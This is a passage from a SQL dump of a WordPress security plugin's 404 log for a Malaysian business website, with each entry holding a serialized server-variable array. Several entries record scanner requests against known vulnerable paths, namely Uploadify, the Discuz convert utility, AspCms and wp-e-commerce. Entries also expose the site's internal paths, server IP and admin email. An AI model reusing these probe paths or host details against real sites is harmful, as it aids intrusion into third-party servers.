6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:9:\"PATH_INFO\";s:22:\"/api/Uploadify/preview\";s:15:\"PATH_TRANSLATED\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"23.228.96.18\";s:11:\"REMOTE_PORT\";s:5:\"58825\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:53:\"http://bintara.com.my/index.php/api/Uploadify/preview\";s:10:\"SCRIPT_URL\";s:32:\"/index.php/api/Uploadify/preview\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHVJN2Cd74l7secq5l6xAAAAVc\";s:8:\"PHP_SELF\";s:32:\"/index.php/api/Uploadify/preview\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571935524.9391\";s:12:\"REQUEST_TIME\";s:10:\"1571935524\";}}','notice','2019-10-24 16:45:26','2019-10-24 16:45:25',35262040,37063840,'http://bintara.com.my/index.php/api/Uploadify/preview',1,0,'23.228.96.18'),(29010,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:52:\"/utility/convert/index.php?a=config&source=d7.2_x2.0\";s:14:\"CONTENT_LENGTH\";s:3:\"948\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:73:\"http://bintara.com.my/utility/convert/index.php?a=config&source=d7.2_x2.0\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:25:\"a=config&source=d7.2_x2.0\";s:21:\"REDIRECT_QUERY_STRING\";s:25:\"a=config&source=d7.2_x2.0\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XbHVHEq-QPicCh3WFsYzYAAAAII\";s:19:\"REDIRECT_SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHVHEq-QPicCh3WFsYzYAAAAII\";s:12:\"REDIRECT_URL\";s:18:\"/convert/index.php\";s:11:\"REMOTE_ADDR\";s:12:\"23.228.96.18\";s:11:\"REMOTE_PORT\";s:5:\"63536\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:10:\"SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHVHEq-QPicCh3WFsYzYAAAAII\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571935516.6957\";s:12:\"REQUEST_TIME\";s:10:\"1571935516\";}}','notice','2019-10-24 16:45:18','2019-10-24 16:45:17',35282776,37085120,'http://bintara.com.my/utility/convert/index.php?a=config&source=d7.2_x2.0',1,0,'23.228.96.18'),(29009,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHVF92Cd74l7secq5l6wAAAAUU\";s:12:\"REDIRECT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"REMOTE_ADDR\";s:12:\"23.228.96.18\";s:11:\"REMOTE_PORT\";s:5:\"54480\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:10:\"SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHVF92Cd74l7secq5l6wAAAAUU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571935511.4181\";s:12:\"REQUEST_TIME\";s:10:\"1571935511\";}}','notice','2019-10-24 16:45:13','2019-10-24 16:45:11',35263520,37072752,'http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp',1,0,'23.228.96.18'),(28053,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:95:\"/website/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:117:\"https://bintara.com.my/website/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:95:\"/website/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaWneHOdAnWdgCw5cMixUwAAABU\";s:19:\"REDIRECT_SCRIPT_URI\";s:117:\"https://bintara.com.my/website/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:95:\"/website/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaWneHOdAnWdgCw5cMixUwAAABU\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"5.135.143.224\";s:11:\"REMOTE_PORT\";s:5:\"33296\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:117:\"https://bintara.com.my/website/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:10:\"SCRIPT_URL\";s:95:\"/website/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XaWneHOdAnWdgCw5cMixUwAAABU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571137401.0703\";s:12:\"REQUEST_TIME\";s:10:\"1571137401\";}}','notice','2019-10-15 11:03:23','2019-10-15 11:03:21',35676136,37483984,'https://bintara.com.my/website/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js',1,0,'5.135.143.224'),(28052,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=11\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/535.14.61 (KHTML, like Gecko) Chrome/53.5.0289.5916 Safari/534.43\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=11\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"165.231.105.181\";s:11:\"REMOTE_PORT\";s:5:\"60447\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaWkILFwawgmiJ6SUM3NhgAAAdQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571136544.251\";s:12:\"REQUEST_TIME\";s:10:\"1571136544\";}}','notice','2019-10-15 10:49:06','2019-10-15 10:49:04',35032256,36838816,'https://bintara.com.my/?page_id=11',1,0,'165.231.105.181'),(28051,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:97:\"/wordpress/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:119:\"https://bintara.com.my/wordpress/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:97:\"/wordpress/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaWdZnOdAnWdgCw5cMioJwAAABc\";s:19:\"REDIRECT_SCRIPT_URI\";s:119:\"https://bintara.com.my/wordpress/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:97:\"/wordpress/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaWdZnOdAnWdgCw5cMioJwAAABc\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"45.55.32.168\";s:11:\"REMOTE_PORT\";s:5:\"56798\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:119:\"https://bintara.com.my/wordpress/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:10:\"SCRIPT_URL\";s:97:\"/wordpress/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaWdZnOdAnWdgCw5cMioJwAAABc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571134823.0749\";s:12:\"REQUEST_TIME\";s:10:\"1571134823\";}}','notice','2019-10-15 10:20:29','2019-10-15 10:20:23',35781840,37577760,'https://bintara.com.my/wordpress/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js',1,0,'45.55.32.168'),(28050,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:29:\"/blog/tag/video-conferencing/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:42:\"ru, uk;q=0.8, be;q=0.8, en;q=0.7, *;q=0.01\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"support@search.yandex.ru\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:193:\"Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B411 Safari/600.1.4 (compatible; YandexMobileBot/3.0; +http://yandex.com/bots)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:51:\"https://bintara.com.my/blog/tag/video-conferencing/\";s:19:\"REDIRECT_SCRIPT_URL\";s:29:\"/blog/tag/video-conferencing/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaV87ZXy-5Xq3T@rVv8hzgAAAhY\";s:12:\"REDIRECT_URL\";s:29:\"/blog/tag/video-conferencing/\";s:11:\"REMOTE_ADDR\";s:12:\"141.8.188.65\";s:11:\"REMOTE_PORT\";s:5:\"53811\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:51:\"https://bintara.com.my/blog/tag/video-conferencing/\";s:10:\"SCRIPT_URL\";s:29:\"/blog/tag/video-conferencing/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaV87ZXy-5Xq3T@rVv8hzgAAAhY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571126509.9377\";s:12:\"REQUEST_TIME\";s:10:\"1571126509\";}}','notice','2019-10-15 08:01:53','2019-10-15 08:01:50',34319016,36120048,'https://bintara.com.my/blog/tag/video-conferencing/',1,0,'141.8.188.65'),(28049,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:132:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.99\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"163.172.105.148\";s:11:\"REMOTE_PORT\";s:5:\"61707\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaVyF28LgiH97JG7BfnjyQAAABI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571123735.2581\";s:12:\"REQUEST_TIME\";s:10:\"1571123735\";}}','notice','2019-10-15 07:15:37','2019-10-15 07:15:35',35033576,36843072,'https://bintara.com.my/?page_id=18',1,0,'163.172.105.148'),(28048,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/toughbook-54/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-54/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/toughbook-54/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaVxEm8LgiH97JG7Bfni3wAAABc\";s:12:\"REDIRECT_URL\";s:14:\"/toughbook-54/\";s:11:\"REMOTE_ADDR\";s:13:\"207.46.13.212\";s:11:\"REMOTE_PORT\";s:5:\"12170\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-54/\";s:10:\"SCRIPT_URL\";s:14:\"/toughbook-54/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaVxEm8LgiH97JG7Bfni3wAAABc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571123474.2491\";s:12:\"REQUEST_TIME\";s:10:\"1571123474\";}}','notice','2019-10-15 07:11:18','2019-10-15 